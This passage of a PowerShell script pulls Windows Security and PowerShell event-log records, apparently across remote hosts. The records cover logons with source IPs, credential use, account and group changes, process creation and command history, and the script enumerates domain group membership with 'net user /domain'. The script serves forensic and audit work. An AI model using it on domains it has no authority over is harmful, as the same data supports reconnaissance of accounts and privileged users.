Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 346 | 347 | } 348 | elseif($using:eventID -eq 4738) 349 | { 350 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4738) - A user account was changed" 351 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4738 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 352 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4738 | 
Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 353 | 354 | } 355 | elseif($using:eventID -eq 4647) 356 | { 357 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4647) - User initiated logoff" 358 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4647 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} 359 | } 360 | elseif($using:eventID -eq 4648) 361 | { 362 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4648) - A logon was attempted using explicit credentials" 363 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4648 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs 
Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 364 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4648 | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 365 | } 366 | elseif($using:eventID -eq 4732) 367 | { 368 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4732) - A member was added to a security-enabled local group" 369 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4732 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Added User 
SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 370 | 371 | } 372 | elseif($using:eventID -eq 4733) 373 | { 374 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4733) - A member was removed from a security-enabled local group" 375 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4733 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Removed User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Removed User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 376 | 377 | } 378 | elseif($using:eventID -eq 4756) 379 | { 380 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4756) - A member was added to a security-enabled universal group" 381 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4756 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 382 | } 383 | elseif($using:eventID -eq 4757) 384 | { 385 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4757) - A member was removed from a security-enabled universal group" 386 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4757 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property 
TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User (SPN)";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 387 | 388 | } 389 | elseif($using:eventID -eq 4776) 390 | { 391 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4776) - The domain controller attempted to validate the credentials for an account" 392 | $get4776=Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4776 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,PSComputerName,MachineName,@{Name="Logon Account";Expression={$_.ReplacementStrings[1]}},@{Name="ComputerName (Source)";Expression={$_.ReplacementStrings[2]}}#,@{Name="Error Type";Expression={$_.ReplacementStrings[3]}} 393 | Write-Output "`n" 394 | for($x=0;$x -lt $get4776.length; $x++) 395 | { 396 | Write-Host "Account Name:"$get4776[$x]."Logon Account" "| Source:"$get4776[$x].'ComputerName (Source)' "| Destination:"$get4776[$x].MachineName "| "$get4776[$x].TimeGenerated 397 | } 398 | } 399 | elseif($using:eventID -eq 4688) 400 | { 401 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4688) - A new process has been created" 402 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4688 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property index,TimeGenerated,MachineName,@{Name="Creator SID";Expression={$_.ReplacementStrings[0]}},@{Name="Creator Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Target SID";Expression={$_.ReplacementStrings[9]}},@{Name="Target Account Name";Expression={$_.ReplacementStrings[10]}},@{Name="Target Account Domain";Expression={$_.ReplacementStrings[11]}},@{Name="Token Elevation Type";Expression={if($_.ReplacementStrings[6] -eq 
"%%1936"){ "full token - User Account Control is disabled" }elseif($_.ReplacementStrings[6] -eq "%%1937"){ "elevated token - User Account Control is enabled, program executed Run as administrator" }else{ "normal value - UAC is enabled, user starts a program from the Start Menu" }}},@{Name="Creator Process Name";Expression={$_.ReplacementStrings[13]}},@{Name="New Process Name";Expression={$_.ReplacementStrings[5]}} 403 | } 404 | elseif($using:eventID -eq 5136) 405 | { 406 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (5136) - A Directory Process Object was Modified" 407 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 5136 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountToObject";Expression={$_.ReplacementStrings[3]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Object";Expression={$_.ReplacementStrings[8]}},@{Name="ObjectGUID";Expression={$_.ReplacementStrings[9]}},@{Name="Class";Expression={$_.ReplacementStrings[10]}},@{Name="Type";Expression={$_.ReplacementStrings[14]}},@{Name="LDAP Display Name";Expression={$_.ReplacementStrings[11]}},@{Name="LDAP Value";Expression={$_.ReplacementStrings[13]}} 408 | } 409 | elseif(($using:eventID -eq 400) -or ($using:eventID -eq 600)) 410 | { 411 | if($using:eventID -eq 400) 412 | { 413 | $event400_600=400 414 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (400) - Windows PowerShell" 415 | Write-Output "`n" 416 | } 417 | else 418 | { 419 | $event400_600=600 420 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (600) - Windows PowerShell" 421 | Write-Output "`n" 422 | } 423 | 424 | try 425 | { 426 | $get400_600=Get-EventLog -Newest $using:newest -InstanceId $event400_600 -LogName "Windows Powershell" -ErrorAction Stop | select TimeGenerated,@{Name="HostApplication";Expression={$_.ReplacementStrings[2]}} | 
select TimeGenerated,HostApplication 427 | 428 | if(($get400_600 | Measure-Object).count -gt 0) 429 | { 430 | $timeGenerated=($get400_600.TimeGenerated).DateTime 431 | $hostApplication=($get400_600.HostApplication | findstr -i "HostApplication") 432 | $engineVersion=($get400_600.HostApplication | findstr -i "EngineVersion") 433 | #$hostPSVersion=Get-Host | Select Version 434 | 435 | 436 | for($c=0;$c -lt $get400_600.length;$c++) 437 | { 438 | if($hostApplication[$c].Split("=") -ne "") 439 | { 440 | Write-Host $timeGenerated[$c] 441 | #Write-Host "Host PowerShell: "$hostPSVersion.Version 442 | Write-Host $hostApplication[$c].Split("=")[1] 443 | if($engineVersion[$c].split("=")[1] -eq "") 444 | { 445 | Write-Host "Command PS Version: -" 446 | } 447 | else 448 | { 449 | Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1] 450 | } 451 | Write-Output "`n" 452 | 453 | } 454 | } 455 | } 456 | else 457 | { 458 | <# #> 459 | } 460 | } 461 | catch 462 | { 463 | <# Try/Catch event 400/600#> 464 | } 465 | 466 | } 467 | elseif(($using:eventID -eq 500) -or ($using:eventID -eq 501)) 468 | { 469 | if($using:eventID -eq 500) 470 | { 471 | $event500_501=500 472 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (500) - Windows PowerShell" 473 | Write-Output "`n" 474 | } 475 | else 476 | { 477 | $event500_501=501 478 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (501) - Windows PowerShell" 479 | Write-Output "`n" 480 | } 481 | 482 | try 483 | { 484 | $get500_501=Get-EventLog -Newest $using:newest -InstanceId $event500_501 -LogName "Windows Powershell" | select TimeGenerated,PSComputerName,@{Name="Command";Expression={$_.ReplacementStrings[2]}} | select TimeGenerated,PSComputerName,Command 485 | 486 | 487 | if(($get500_501 | Measure-Object).count -gt 0) 488 | { 489 | $timeGenerated=($get500_501 | Select TimeGenerated) 490 | #$psComputerName=$get500_501.PsComputerName 491 | 
$commandPath=($get500_501 | Select Command) | format-List | findstr -i "CommandPath" 492 | $commandName=($get500_501 | Select Command) | format-List | findstr -i "CommandName" 493 | $commandType=($get500_501 | Select Command) | format-List | findstr -i "CommandType" 494 | $commandLine=($get500_501 | Select Command) | format-List | findstr -i "CommandLine" 495 | $engineVersion=($get500_501 | Select Command) | format-list | findstr -i "EngineVersion" 496 | 497 | 498 | 499 | 500 | for($c=0;$c -lt $get500_501.length;$c++) 501 | { 502 | 503 | if($commandLine[$c].Split("=") -ne "") 504 | { 505 | 506 | Write-Host $timeGenerated[$c] 507 | #Write-Host $psComputerName[$c] 508 | if($commandName[$c].split("=")[1] -eq ""){Write-Host "CommandName: -"}else{Write-Host "CommandName: "$commandName[$c].split("=")[1].Trim(" ")} 509 | if($commandType[$c].split("=")[1] -eq ""){Write-Host "CommandType: -"}else{Write-Host "CommandType: "$commandType[$c].split("=")[1].Trim(" ")} 510 | if($commandPath[$c].split("=")[1] -eq ""){Write-Host "CommandPath: -"}else{Write-Host "CommandPath: "$commandPath[$c].split("=")[1].Trim(" ")} 511 | if($commandLine[$c].split("=")[1] -eq ""){Write-Host "CommandLine: -"}else{Write-Host "CommandLine: "($commandLine[$c].split("=")[1]).Trim(" ")} 512 | if($engineVersion[$c].split("=")[1] -eq ""){Write-Host "Command PS Version: -"}else{Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1]} 513 | Write-Output "`n" 514 | 515 | } 516 | else 517 | { 518 | <# #> 519 | } 520 | 521 | } 522 | } 523 | } 524 | catch 525 | { 526 | <# Try/Catch event 500/501#> 527 | } 528 | 529 | } 530 | elseif(($using:eventID -eq 4728) -or ($using:eventID -eq 4729)) 531 | { 532 | if($using:eventID -eq 4728) 533 | { 534 | $event4728_29=4728 535 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID 4728 - A member was added to a security-enabled global group" 536 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid 
$event4728_29 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Added to Security Group";Expression={$_.ReplacementStrings[2]}} 537 | 538 | } 539 | else 540 | { 541 | $event4728_29=4729 542 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID 4729 - A member was removed from a security-enabled global group" 543 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid $event4728_29 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Removed from a Security Group";Expression={$_.ReplacementStrings[2]}} 544 | 545 | } 546 | 547 | #Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4728 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Added to Security Group";Expression={$_.ReplacementStrings[2]}} | Format-Table -AutoSize 548 | #$using:newest 549 | #[wmi] "win32_userAccount.Domain='hackme',Name='war'" | select -property sid 550 | $groupUsers=$groupHistory | Group-Object {$_."Account Name"} | Select -Property name,group 551 | 552 | #$groupHistory | Group-Object {$_."Account Name"} | Where-object {$_.Name -match "CN=$groupUsers"} | %{$_.Group} | Select -Property "Added to Security Group" 553 | #loop 554 | $mySIDarray=New-Object System.Collections.ArrayList 555 | 556 | #Add unique SIDs to array 557 | for($sidcounter=0;$sidcounter -lt $groupHistory.length; $sidcounter++) 558 | { 559 | if($mySIDarray -notcontains ($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") 560 | { 561 | 
#https://learn-powershell.net/2014/09/13/quick-hits-sending-data-to-null/ 562 | $mySIDarray.add(($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") | Out-Null 563 | } 564 | } 565 | 566 | for($c=0;$c -lt $groupUsers.length;$c++) 567 | { 568 | 569 | $userscn=$groupUsers[$c].Name 570 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Enumerating $userscn group history" 571 | $groupHistory | Group-Object {$_."Account Name"} | Where-object {$_.Name -match "$userscn"} | %{$_.Group} | Format-Table #| Select -Property "Added to Security Group" 572 | Write-Output "`n" 573 | Write-Host "[*] " -ForegroundColor Yellow -Nonewline; Write-Output "Extra Information ..." 574 | #Convert SID to username and get user groups,comments 575 | $userSID=$mySIDarray[$c] 576 | $accountName=([wmi]"win32_SID.SID='$userSID'").AccountName 577 | $userBelongToGroups=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String "Global Group"} 578 | $userComment=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String -Pattern "^comment"} 579 | Write-Output "Username> $accountName" 580 | Write-Host "[!] 
User is currently belong to> $userBelongToGroups" -ForegroundColor Green 581 | Write-Host "$userComment" -ForegroundColor Red 582 | Write-Output "`n" 583 | 584 | } 585 | 586 | 587 | 588 | } 589 | else <# Executing all event logs if the user doesn't specify one #> 590 | { 591 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4624) - An account was successfully logged on" 592 | 593 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4624 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[18]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[19]}} 594 | 595 | 596 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4625) - An account failed to log on" 597 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[19]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[20]}} 598 | 599 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4634) - An account was logged off" 600 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4634 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}},@{Name="Security ID";Expression={$_.ReplacementStrings[0]}} 601 | 602 | 603 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4647) - User initiated logoff" 604 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4647 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property 
TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Format-Table -Property TimeGenerated,Username,MachineName 605 | 606 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4648) - A logon was attempted using explicit credentials" 607 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4648 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 608 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4648 | Select -Property TimeGenerated,MachineName,@{Name= "Original Account SID";Expression={$_.ReplacementStrings[0]}},@{Name="Original Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Original Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Original Account Logon ID";Expression={$_.ReplacementStrings[3]}},@{Name="RunAs Account Name";Expression={$_.ReplacementStrings[5]}},@{Name="RunAs Account Domain";Expression={$_.ReplacementStrings[6]}},@{Name="Target Server Name";Expression={$_.ReplacementStrings[8]}},@{Name="Additional Information";Expression={$_.ReplacementStrings[9]}},@{Name="Process 
ID";Expression={$_.ReplacementStrings[10]}},@{Name="Process Name";Expression={$_.ReplacementStrings[11]}},@{Name="Network Address";Expression={$_.ReplacementStrings[12]}},@{Name="Network"; Expression={$_.ReplacementStrings[13]}} 609 | 610 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4720) - A user account was created" 611 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4720 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Created Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 612 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4720 | Select -Property TimeGenerated,MachineName,@{Name="Created Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account 
Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 613 | 614 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4732) - A member was added to a security-enabled local group" 615 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4732 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 616 | 617 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4733) - A member was removed from a security-enabled local group" 618 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4733 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 619 | 620 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4738) - A user account was changed" 621 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4738 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account 
SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 622 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4738 | Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 623 | 624 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4776) - The domain controller attempted to validate the credentials for an account" 625 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4776 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,PSComputerName,MachineName,@{Name="Logon Account";Expression={$_.ReplacementStrings[1]}},@{Name="ComputerName 
(Source)";Expression={$_.ReplacementStrings[2]}},@{Name="Error Type";Expression={$_.ReplacementStrings[3]}} 626 | 627 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4688) - A new process has been created" 628 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4688 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property index,TimeGenerated,MachineName,@{Name="Creator SID";Expression={$_.ReplacementStrings[0]}},@{Name="Creator Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Target SID";Expression={$_.ReplacementStrings[9]}},@{Name="Target Account Name";Expression={$_.ReplacementStrings[10]}},@{Name="Target Account Domain";Expression={$_.ReplacementStrings[11]}},@{Name="Token Elevation Type";Expression={if($_.ReplacementStrings[6] -eq "%%1936"){ "full token - User Account Control is disabled" }elseif($_.ReplacementStrings[6] -eq "%%1937"){ "elevated token - User Account Control is enabled, program executed Run as administrator" }else{ "normal value - UAC is enabled, user starts a program from the Start Menu" }}},@{Name="Creator Process Name";Expression={$_.ReplacementStrings[13]}},@{Name="New Process Name";Expression={$_.ReplacementStrings[5]}} 629 | 630 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4756) - A member was added to a security-enabled universal group" 631 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4756 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 632 | 633 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4757) 
